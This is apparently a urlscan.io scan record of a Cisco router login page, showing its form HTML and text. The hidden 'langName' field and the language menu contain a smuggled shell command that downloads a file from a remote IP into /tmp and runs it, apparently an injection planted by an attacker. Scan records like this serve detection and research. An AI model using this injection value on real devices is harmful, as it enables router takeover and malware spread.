wsip-98-178-238-213.sd.sd.cox.net
Open in
urlscan Pro
98.178.238.213
Public Scan
Submitted URL: http://wsip-98-178-238-213.sd.sd.cox.net/
Effective URL: https://wsip-98-178-238-213.sd.sd.cox.net/
Submission: On July 15 via api from US — Scanned from DE
Effective URL: https://wsip-98-178-238-213.sd.sd.cox.net/
Submission: On July 15 via api from US — Scanned from DE
Form analysis
1 forms found in the DOMName: form_contents — POST /cgi-bin/userLogin.cgi
<form name="form_contents" method="post" autocomplete="off" action="/cgi-bin/userLogin.cgi">
<input type="hidden" name="login" value="true">
<input type="hidden" name="portalname" value="CommonPortal">
<input type="hidden" name="password_expired" id="password_expired" value="0">
<input type="hidden" name="auth_key" value="1964300002">
<input type="hidden" name="auth_server_pw" value="">
<input type="hidden" name="md5_old_pass" value="">
<input type="hidden" id="langName" name="langName" value="ENGLISH|echo 24;cd /tmp;wget http://149.28.91.166/x;sh x|,ENGLISH,Deutsch,Espanol,Francais">
<input type="hidden" name="changelanguage" value="">
<input type="hidden" name="submitStatus" value="0">
<input type="hidden" name="pdStrength" value="0">
<table id="nk_login" width="223" border="0" cellpadding="0" cellspacing="0" style="border-collapse:collapse;">
<tbody>
<tr>
<td width="70" height="17"></td>
<td class="ErrorArrow">
<script>
var error_string = (window.location.href.split('err='))[1];
if (error_string && error_string.match('Login_Fail')) document.write('▼');
</script>
</td>
</tr>
<tr>
<td class="UserNameFeild">
<script>
document.write(Language.LOGIN_Username);
</script>Username:<img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="UserNameFeild"><input type="text" name="username" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_Password);
</script>Password:<img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_Language);
</script>Language:<img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<script>
document.write('<td class="LoginFeild">');
var i;
var nameList = document.getElementById("langName").value.split(",");
document.write('<select id="LanguageList" name="LanguageList" onChange="LanguageChange()" style="font-family:Arial,Helvetica,sans-serif;font-size:12px;height:18px">');
var languageValue;
var languageName;
for (i = 0; i < nameList.length; i++) {
languageValue = nameList[i];
switch (languageValue) {
case "Deutsch":
languageName = "Deutsch";
break;
case "ENGLISH":
languageName = "English";
break;
case "Espanol":
languageName = "Español";
break;
case "Francais":
languageName = "Français";
break;
case "Italiano":
languageName = "Italiano";
break;
default:
languageName = "undefined";
break;
}
document.write('<option value="');
document.write(languageValue);
document.write('">');
document.write(languageName);
document.write('</option>');
}
document.write('</select></td>');
</script>
<td class="LoginFeild"><select id="LanguageList" name="LanguageList" onchange="LanguageChange()" style="font-family:Arial,Helvetica,sans-serif;font-size:12px;height:18px">
<option value="ENGLISH|echo 24;cd /tmp;wget http://149.28.91.166/x;sh x|">undefined</option>
<option value="ENGLISH">English</option>
<option value="Deutsch">Deutsch</option>
<option value="Espanol">Español</option>
<option value="Francais">Français</option>
</select></td>
</tr>
<tr>
<td class="LoginFeild"></td>
<td>
<table width="100%">
<tbody>
<tr>
<td class="LoginFeild" width="50">
<script>
PrintSTButton("Login", " " + Language.DEFAULT_Log_in + " ", "SendPassword();", "submit");
</script><input type="button" class="STbutton" width="28" name="Login" id="Login" value=" Log In " onmouseover="ChangeButtonStyle(this,'mouseover')" onmouseout="ChangeButtonStyle(this,'mouseout')"
onmousedown="ChangeButtonStyle(this,'mousedown')" onmouseup="ChangeButtonStyle(this,'mouseup');this.blur();" onclick="SendPassword();">
</td>
<td width="5"></td>
<td><img id="process" border="0" src="/images/login_progress.gif" width="16" height="16" style="visibility:hidden"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table id="change_password" width="303" border="0" cellpadding="0" cellspacing="0" style="border-collapse:collapse;display:none">
<tbody>
<tr>
<td></td>
<td class="ErrorArrow">
<script>
var error_string = (window.location.href.split('err='))[1];
if (error_string && error_string.match('expired') || error_string && error_string.match('Password_Same')) document.write('▼');
</script>
</td>
</tr>
<tr>
<td width="180" class="LoginFeild">
<script>
document.write(Language.LOGIN_Current_Password);
</script>Current Password:<img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="current_password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_New_Password);
</script>New Password:<img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="new_password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_ReEnter_New_Password);
</script>Re-enter New Password:<img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="re_new_password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild"></td>
<td class="LoginFeild">
<script>
PrintSTButton("Save", Language.GLOBAL_BUTTON_Save, "SendPassword();", "", "submit");
document.write('<img border="0" src="/images/_blank.gif" width="5" height="1">');
PrintSTButton("Cancel", Language.GLOBAL_BUTTON_Cancel, "show_login();");
</script><input type="button" class="STbutton" width="22" name="Save" id="Save" value="Save" onmouseover="ChangeButtonStyle(this,'mouseover')" onmouseout="ChangeButtonStyle(this,'mouseout')" onmousedown="ChangeButtonStyle(this,'mousedown')"
onmouseup="ChangeButtonStyle(this,'mouseup');this.blur();" onclick="SendPassword();"><img border="0" src="/images/_blank.gif" width="5" height="1"><input type="button" class="STbutton" width="24" name="Cancel" id="Cancel" value="Cancel"
onmouseover="ChangeButtonStyle(this,'mouseover')" onmouseout="ChangeButtonStyle(this,'mouseout')" onmousedown="ChangeButtonStyle(this,'mousedown')" onmouseup="ChangeButtonStyle(this,'mouseup');this.blur();" onclick="show_login();">
</td>
</tr>
</tbody>
</table>
</form>
Text Content
You have logged out of the Cisco Router. Invalid Username or Password. Please try again.The old password has expired. Please change the password.New Password cannot be the same as Old Password. Please enter a new password.Password strength is not sufficient. Please enter a new password.The confirm password does not match with the new password. Please correct it! Router Username: Password: Language: undefinedEnglishDeutschEspañolFrançais Current Password: New Password: Re-enter New Password: © 2015 Cisco Systems, Inc. All Rights Reserved. Cisco, Cisco Systems, and the Cisco Systems logo are registered trademarks or trademarks of Cisco Systems, Inc. and/or it's affiliates in the United States and certain other countries.